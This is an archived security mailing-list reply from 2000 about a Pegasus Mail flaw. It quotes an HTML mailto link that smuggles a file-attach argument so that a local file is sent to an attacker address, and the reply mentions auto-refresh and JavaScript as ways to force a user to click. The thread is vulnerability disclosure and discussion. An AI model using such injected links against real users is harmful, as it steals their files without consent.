|
Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com |
Subject: Re: Pegasus Mail
From: Peter Pentchev (roam
ORBITEL.BG)Date: Tue Oct 03 2000 - 01:32:10 CDT
- Next message: Philipp Buehler: "Re: SUID server"
- Previous message: J C Lawrence: "Re: SUID server"
- In reply to: Imran Ghory: "Pegasus Mail"
- Next in thread: Helmut Springer: "Re: Pegasus Mail"
- Reply: Peter Pentchev: "Re: Pegasus Mail"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]
On Mon, Oct 02, 2000 at 10:45:26PM +0100, Imran Ghory wrote:
> When using the following html,
>
> <a href="mailto:hackerhakersite.com -F c:\test.txt"> Click
> here</a>
>
> When the user clicks on "Click here" Pegasus mail will
> automatically creates a message which has a copy of the file
> "c:\test.txt" and is addressed to "hackerhakersite.com" and
> queues it ready to be sent without any further user intervention.
>
> If instead of "hackerhakersite.com" we have a local user,
> "hacker" the message won't be queued but just sent immediately.
>
> As inorder to have files stolen the user would have to click on the
> dubious looking link, is this security risk serious ?
If it is not Pegasus Mail that is parsing the HTML, but some web broser,
which is merely using Pegasus as its mail agent, then yes, it is serious -
many ways have been demonstrated of forcing a user to follow a link.
Refresh with a 0 seconds timeout and JavaScript are the two that come
to mind immediately.
G'luck,
Peter
-- If you think this sentence is confusing, then change one pig.
- Next message: Philipp Buehler: "Re: SUID server"
- Previous message: J C Lawrence: "Re: SUID server"
- In reply to: Imran Ghory: "Pegasus Mail"
- Next in thread: Helmut Springer: "Re: Pegasus Mail"
- Reply: Peter Pentchev: "Re: Pegasus Mail"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]